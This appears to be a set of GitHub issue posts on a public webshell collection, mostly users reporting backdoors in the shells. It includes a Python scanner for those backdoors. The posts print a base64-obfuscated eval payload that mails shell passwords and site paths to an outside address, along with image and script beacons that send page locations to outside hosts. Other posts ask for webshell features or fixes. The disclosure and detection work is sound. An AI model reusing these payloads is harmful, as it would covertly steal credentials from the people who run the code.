tennc / webshell
This is a webshell open source project
Home Page: http://tennc.github.io
License: MIT License
Hi guys! First off, thanks for your page.
I'm looking for a MySQL shell client for JSP. (I just want to browse tables and columns.)
I've found a MySQL client in one of your shells, but there I can only run simple SQL commands, and that isn't enough for me. Any help?
$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";
eval(base64_decode($wsobuff));
After decoding:
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$judul = "WSO 2.6 http://$target by $visitor";
$body = "Bug: $target by $visitor - $auth_pass";
**if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }**
}
else { $visitc++; }
@setcookie("visitz",$visitc);
While reviewing the antSword-shells/jsp_custom_script_for_oracle.jsp file, a security concern has been identified at line 414. The code in question may be exploitable if not handled correctly.
antSword-shells/jsp_custom_script_for_oracle.jsp file in the repository. The encryption function should use a unique and unpredictable IV (Initialization Vector) for each encryption operation to ensure the security of the encrypted data.
The encryption function is using a static key as an IV, which can be exploited to potentially break the encryption.
Using a static IV can lead to serious security vulnerabilities, allowing attackers to perform various attacks.
It is recommended to generate a new, random IV for each encryption operation and ensure it is transmitted along with the encrypted data, if necessary. This would align with best practices for secure encryption.
The file in question is located at: antSword-shells/jsp_custom_script_for_oracle.jsp#L414
Another error is found in: jspx_custom_script_for_mysql.jspx
https://www.douyin.com/user/self?modal_id=7335646668769021199&showTab=post
Supports shell, file management and split screen. Supports screen-recording playback.
In the code: eg: /etc/passwd<br><? ...
uses the short tag; not all servers support this. Change it to <?php
The following submodule repo reports a 404 error:
[submodule "ysrc/webshell-sample"]
path = ysrc/webshell-sample
url = https://github.com/ysrc/webshell-sample
If the repo is no longer there, can this submodule be deleted?
If you try to run this file on a newer webserver:
webshell/web-malware-collection-13-06-2012/PHP/c99.txt
You get lots of php errors
could you update the shell to php7 pls?
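Thanks for providing this webshell collection.
I forked your webshell repo, but I want to be sure that the shells in my repo have no backdoors, so I plan to check all the files one by one.
I saw that your readme says: "I do not guarantee that any of the shells is free of backdoors, but I will never deliberately add a backdoor to the ones I upload myself."
Could you add to your readme a list of the shell files that you have personally confirmed to be free of viruses? That would save me from checking a lot of shells :)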
In line 75 you can see this code:
$wsobuff = "…"; eval(base64_decode($wsobuff));
When I decode it, I see a mail() function that sends (path, password, visitor IP) to this email: [email protected] @mail("[email protected]",$judul,$body,$auth_pass);
Hey there!
I belong to an open source security research community, and a member (@rohit75033) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
Line855:
uc(dx()) = "http://adgoog.gicp.net/index.asp?ct="
In the code <img src=\"http://emp3ror.com/images/emplogo1.gif\">
sends the referer of the path to the emp3ror.com server. The administrator catches all referers in the emp3ror.com server log. Don't be evil.
Other backdoor: <?php echo base64_decode('PFNDUklQVCBTUkM9JiN4NjgmI3g3NCYjeDc0JiN4NzAmI3gzYSYjeDJmJiN4MmYmI3g3NyYjeDc3JiN4NzcmI3gyZSYjeDZjJiN4NmYmI3g2MyYjeDYxJiN4NmMmI3g3MiYjeDZmJiN4NmYmI3g3NCYjeDJlJiN4NmUmI3g2NSYjeDc0JiN4MmYmI3g2OSYjeDYyJiN4NmUmI3g2NSYjeDZjJiN4NjUmI3g3MiYjeDJmJiN4NzkmI3g2MSYjeDdhJiN4MmUmI3g2YSYjeDczPjwvU0NSSVBUPiANCg==');?>
The render is: a=new/**/Image();a.src='http://localroot.net/ibneler/index.php?a='+escape(location.href);
This sends the referring site to other people.
This shell is dirty.
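An added example (not part of the original posts or of the repository's code): a triage scanner for the two patterns reported above, a base64 literal run through eval(base64_decode(...)) and one echoed through base64_decode with HTML numeric entities underneath. The sample inputs, the example.invalid hosts and the indicator list are constructed assumptions.

```python
import base64
import binascii
import html
import re

# base64_decode('<literal>') and "$var = '<literal>'; ... base64_decode($var)"
LITERAL_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=]{16,})\1\s*\)""")
ASSIGN = re.compile(r"""\$(\w+)\s*=\s*(['"])([A-Za-z0-9+/=]{16,})\2\s*;""")
VAR_CALL = re.compile(r"base64_decode\(\s*\$(\w+)\s*\)")

# Assumed indicator set, modelled on what the reports describe: mail(),
# outbound URLs, and request/credential data handed to either.
INDICATORS = {
    "mail": re.compile(r"\bmail\s*\(", re.I),
    "url": re.compile(r"https?://[^\s'\"<>)]+", re.I),
    "client_data": re.compile(r"REMOTE_ADDR|HTTP_HOST|REQUEST_URI|location\.href|auth_pass"),
}

def decode_layers(blob):
    """Base64-decode, then undo HTML numeric entities; None if not valid base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    return html.unescape(raw.decode("utf-8", errors="replace"))

def scan(source):
    """Return one finding per decoded blob that matches any indicator."""
    blobs = [m.group(2) for m in LITERAL_CALL.finditer(source)]
    assigned = {m.group(1): m.group(3) for m in ASSIGN.finditer(source)}
    blobs += [assigned[m.group(1)] for m in VAR_CALL.finditer(source)
              if m.group(1) in assigned]
    findings = []
    for blob in blobs:
        decoded = decode_layers(blob)
        hits = sorted(n for n, rx in INDICATORS.items() if decoded and rx.search(decoded))
        if hits:
            findings.append({"indicators": hits, "decoded": decoded})
    return findings

def _b64(text):
    return base64.b64encode(text.encode()).decode()

# Constructed samples (not taken from the repository).
SAMPLE_MAILER = '$buf = "%s"; eval(base64_decode($buf));' % _b64(
    '$t = $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];'
    ' @mail("collector@example.invalid", $t, $auth_pass);')
SAMPLE_BEACON = "<?php echo base64_decode('%s');?>" % _b64(
    "<SCRIPT SRC=&#x68;&#x74;&#x74;&#x70;&#x3a;&#x2f;&#x2f;beacon.example.invalid/x.js></SCRIPT>")
SAMPLE_CLEAN = "<?php echo base64_decode('%s');?>" % _b64("just a harmless banner string")
```

Run `scan()` over each file's text; a finding means the decoded blob needs manual review, and an empty result does not prove a file is clean, since other encodings are not covered.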
Hello, I'm reporting an issue with the file upload functionality in the 'webshell' project.
Steps to Reproduce:
Log in to the webshell application.
Navigate to the file upload section.
Attempt to upload a file located at C:\Users\myuser\Documents\example.txt.
Expected Behavior:
The file should be uploaded successfully, and the full path C:\Users\myuser\Documents\example.txt should be preserved in the webshell interface.
Actual Behavior:
When attempting to upload the file, the application appears to strip the full path and only retain the filename example.txt. This makes it difficult to keep track of the original file location.
Environment:
Operating System: Windows 10
Browser: Google Chrome version 98.0.4758.102
Additional Information:
This issue seems to be related to the way the upload functionality handles file paths. Preserving the full file path would be very helpful for users who need to keep track of the original file locations.
Please let me know if you have any questions or need further information. I'm happy to provide more details to help resolve this problem.
<img width=1 height=1 src="http://websafe.facaiok.com/just7z/sx.asp?u=***.***.***.***/ghost.php&p=ghost"/>
At least give us the password.
wl168168.php is a webshell?
I have never known about it.
Can you give me a link about it? 3q.
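In the directory webshell/www-7jyewu-cn/DOC_ZIBSZXBIEG.php,
there is a backdoor at line 1268; please note it. This is still quite a good shell.
As per the title.
There is a problem with this code: next raises an error. Notice: Use of undefined constant next - assumed 'next' in
asx73ert is not assert, so it should raise an error too, right? function 'asx73ert' not found or invalid function name in
My test environment is PHP 5.6.8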